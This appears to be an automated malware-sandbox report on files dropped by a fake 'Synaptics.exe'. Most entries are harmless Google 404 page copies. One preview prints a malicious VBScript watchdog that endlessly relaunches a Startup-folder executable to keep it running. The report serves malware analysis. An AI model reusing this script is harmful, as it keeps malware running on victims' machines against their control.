                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.272046410942183
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0W9bSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+bb+pAZewRDK4mW
                                                                                                                            MD5:7B9015C5B3BB827349CC056541298CFD
                                                                                                                            SHA1:008A3EC2DD5208486273AEF419118DD46A55A65B
                                                                                                                            SHA-256:F77A7829A04B1F65152B7D15F215461E06734077DA99D9182A45933900EC27AC
                                                                                                                            SHA-512:11F5E5A97E5F1DC76CD98169312E9E96F700F00AACAC5DE27101D4B01DA04E6BB5A75C531DA38E63FFC4EDBBC243739066E183686164FBE9A735D7EE16E488BC
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9IEqID7OX7DOhaaqwSfsUQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\QaXB4AB.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.26421118553944
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0iltXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3X+pAZewRDK4mW
                                                                                                                            MD5:49BFA57395271EFF5C77D8E567258DD6
                                                                                                                            SHA1:011738A50EF57B68E4286F0ABB3C9DEDB8D3985A
                                                                                                                            SHA-256:19E8772ED7B1EE34E647D25C902AAE8BAEBC4465528ACD73713C6CADEBA63FEA
                                                                                                                            SHA-512:03291D0B092D0DA8D176C24DB34E39FD9647E42423DCAE84945995695F4A56C11C2527F59A0D6F1E57B5CA1B04519A574001F2302625163346C12C0560A5ABD6
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xSPMlMomcJycqhA2I7ROgA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\QjKwxZt.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.260660257753611
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+01mSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+im+pAZewRDK4mW
                                                                                                                            MD5:2F68EF2E4038D685B9E8A54E1A185923
                                                                                                                            SHA1:5FEC471720BE312E2247E518C5A6A70449C2757A
                                                                                                                            SHA-256:BD5FAE95560CE89A46B69F57C9FF3868BD9C0AE86775E0B99540D9E3C60E7916
                                                                                                                            SHA-512:B326829239BF1FC56DA6A3FC7EC859889A7E53BA3F560F6ED9199B525804F1C17D7F7017CE96FB1558389AD7491D1A6BAB1E7CCD0CB716641043DF0C21B871C9
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SQodiieCaIZHxd6Ig5Kv_A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\RaIr4ky.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2605150039306805
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0aSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+J+pAZewRDK4mW
                                                                                                                            MD5:83F96F946E73C086D268237E8EE258B1
                                                                                                                            SHA1:C4555C6E6C7E91E287A934951328043F1D955E3A
                                                                                                                            SHA-256:ADC3C3ED295C795ECA91DD64E5CD11C784145159424F52F56708513F8546499E
                                                                                                                            SHA-512:F31DAFF67B4327E95F9AF1CD00AEF16D24B7589F936CBC792DDBB404C99589D232C059F20FC0482086B4A86AF71A03A8D32763B85C94BC51D2AA6D9B11B0BF13
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tp2bTO9HXqNxq8kuJkg-Qw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\RuZknxq.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.257124056899403
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0tqSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+sq+pAZewRDK4mW
                                                                                                                            MD5:8EF58FF0B3C5EB74BA7E76AB59627575
                                                                                                                            SHA1:C666A80A534F39FD1D867A97C8B6F97880310F53
                                                                                                                            SHA-256:55566D6474DCEC7FA58D6C32FD6F1C6739F8AB4745DF2E8253A311D3DEE6B9E3
                                                                                                                            SHA-512:0429353071E1858004036DC2B23291F5DB0AA73C311BFB3B02A763183CDAC87DD9F51BD66EAD81BCF936CB8A680E24A8C1C6CB21620EAAD2B4E97CF0BDBFA788
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VjlxoKkkNuC7k1U5tjN3hw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\Sr96At1.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.262530746278961
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0n0SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+O0+pAZewRDK4mW
                                                                                                                            MD5:4C20FD36954ECDB423A2F83E2AA15A24
                                                                                                                            SHA1:D0A43CCAABDA92E3C172431E47DECB5C320F542E
                                                                                                                            SHA-256:F16C615BCDF48E14728A2E5103CDE644693911FFAF98453BF3AC48EAC6F69D5B
                                                                                                                            SHA-512:4BDE7524003DFC4DF7984F28686CDAF20E520EBC8710FA91BC1DE17DA2E6CDAB69F38E4A3DA62054D97EA567BA51E8F062509F597188AB9A2FE5F875D308EB44
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-noDEZsvN83sZCnzL1i8IQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\SrptvSm.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.265821655796231
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0kdtSSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+XjS+pAZewRDK4mW
                                                                                                                            MD5:DA7C7EAC2594E2FA8237826C1DF52488
                                                                                                                            SHA1:32B1D00456782A8F3487ADC5C3AEFF1F89E6E947
                                                                                                                            SHA-256:31FED7302A431E0548052BABF2F9E9D314AE88AEDE76074CB89B43DFCF0B680F
                                                                                                                            SHA-512:9EE95ED4CD21743598A12AD67A8D1F86D42781E8D537FAC3090D1252049CA1655153FC1F39D85C90BD670485245782DB33190736660C2E56803DC1FD3EC1F95C
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eFTTnJqw224DCqMDkdlMIA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\TGsEbvy.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.258410978599604
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0BSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+G+pAZewRDK4mW
                                                                                                                            MD5:65466D9F523284F8E60F8BEE321F1B4E
                                                                                                                            SHA1:97D4CE14A42D3F8B946FE012D12FBDF60EF42400
                                                                                                                            SHA-256:FF0F099DA2EEE4B4AFC5C3CBCAE3B2DF848D6C564F507F1053A90B019BAB7BF9
                                                                                                                            SHA-512:C487D20C8EEC641F5AA61A2AC403ADF8A0FD7C12E48C9858034F6E90B27E7344132C13A02AE08BECEBD27E7E366F0B89E7D9F378597CB4B4B3A9629459B84C3C
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="u-ULQV2E-vlTRp13rndONA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\VVkn83T.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2681466833827155
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0YqISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9X+pAZewRDK4mW
                                                                                                                            MD5:374183D543B29179CD7C822DBE4EE316
                                                                                                                            SHA1:B96533FE41CCAEE87931FE933EB8874FEC96212F
                                                                                                                            SHA-256:CCB9FA9768414289BB98BDA3DC6F8DA6F54A28F687BB70F40F31E2C54F9BFE5F
                                                                                                                            SHA-512:D88722F2978C7F16EE9B3DC31A697DB36DB301328050AC16F7477F59FC87B76988B76555F1478AC6A1DC59A603D5970F45D481636BEE5B84A9674937F1F3E21C
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KjY9inLbIS9T4mU3UvK6xg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\WLJOQW.vbs

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):891
                                                                                                                            Entropy (8bit):5.342962320971981
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:dF/UFHHmuVMHiU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFHGucXt+G+7xLxe0WABNVIqZaVzgA
                                                                                                                            MD5:44B5015EE40F27FEF5AEB980F2EB7D38
                                                                                                                            SHA1:009BD9BEE2ED7BFD888B5BA094559355A37E7E64
                                                                                                                            SHA-256:32C6E94CD8E5133A241ADC7DCCEDFBEC0E0B3E4A0A0DB33B4C0DAE01304CC137
                                                                                                                            SHA-512:B422282D9E571B35D93B714B28E861DCE2451E2DE06A5485FACA702AE954E1A6F8028023173C2A772F8BCB393A465FFB4020E322A017C5AF4EB791805830E627
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_update.exe"..fileset = """C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

                                                                                                                            C:\Users\user\AppData\Local\Temp\XZOYSHd.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.258601726800212
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0U3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+F+pAZewRDK4mW
                                                                                                                            MD5:D52BE34E042050D96F02E26D2448FF1F
                                                                                                                            SHA1:54887998C814697E2B2CF696E4AD174448E0B084
                                                                                                                            SHA-256:C31AAB80B80D1AD8507D10C6DFC06F5DED7B0CA450D130F1C5C1644C2446526F
                                                                                                                            SHA-512:7223AA866872C205E8F1C4FCD62A29E8BE3E09B6F5DA2AF2DA3EEAE1A565446674463EE22D2470C021F50500984813C3A186CA645E74F0D09BF289B321DE877D
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ByL1hswh4YAtxIYJesyx7Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\XjPgNlA.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.249006021790994
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0pMSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+cM+pAZewRDK4mW
                                                                                                                            MD5:E4478B0CC3267C9B4BD4A360695DE114
                                                                                                                            SHA1:927B2A9D3EC5A2BC2498E1BF9AEF648272EC2798
                                                                                                                            SHA-256:4B3F8B223226B4F019930112EB785006F6D67645EBD139503BFE175E991D5EAA
                                                                                                                            SHA-512:262ED5A7D28E195E6DBFD68ECE880DD1DE761B51CB875F44D680FA92779B76AF31243D8F98CB57D3721EBE51543AB3357F1E36C2303790CAF163A815AA3F2FED
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Hf0Z0l1WnK4l019icY_2yg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\XxOL5Oh.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.260660958324797
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0V3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+i3+pAZewRDK4mW
                                                                                                                            MD5:03CE20025FC5A2842A9FC582D7900A7E
                                                                                                                            SHA1:8238DDEB9427CD968063D315D339B5CDD1ACCE14
                                                                                                                            SHA-256:C45BDD8C64366821F169027C7C525C4B9CC91189B4E0B35F43C34C327BF46981
                                                                                                                            SHA-512:9A2159C0505035DEE175AF3C83B94C12CBE2FC647B5FBDC2ABF0A892E7356E7DC8DEF0E54A7A507078172725E6B3768606A985C6AF82CB724C58BDE6A08E3545
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Zvir3h0XYtksr9FqVUbIZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\YZvJRKb.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2696262472462285
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0sr4DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Tc+pAZewRDK4mW
                                                                                                                            MD5:938CF72B18F99749D91986D458AF1958
                                                                                                                            SHA1:F1B378ADFDDC19D7BAB2E4205B572B2828FF1E8B
                                                                                                                            SHA-256:F5E0E66FED427E66AEB1EA4E6D28A18D19137B259B1252BB9B7EA3B0B6C817BD
                                                                                                                            SHA-512:B70A13286D00BE5C5E30B446ACE6A49BDAC7CD33857D045941E11BDF7BB20961EEEF7838BD5A6B8A3F064B1C70D15BB8A1F6DC2C5B47176A408493EC09219E94
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2yBecEDR1i4S6Ig6DCcNLA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\ZsXWA2O.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2699550702554205
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0bbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                                                            MD5:CF4815575D90F62BA456B04F6D2D0CBA
                                                                                                                            SHA1:FE23FC4E38531E57CDC3633242F3BF0863C94354
                                                                                                                            SHA-256:33EC5149A943C1C89F94E6107397D7E5AA67729AB81E52850A2FFE8EF1FFA433
                                                                                                                            SHA-512:FE0DE14600529239123048A8FEFA468D45128A24527CD30FF179BD879C71F09B7E8E87D9FD076C35C7E965C90575954D2A18355543CC480B0903C73CD45EF11A
                                                                                                                            Malicious:false
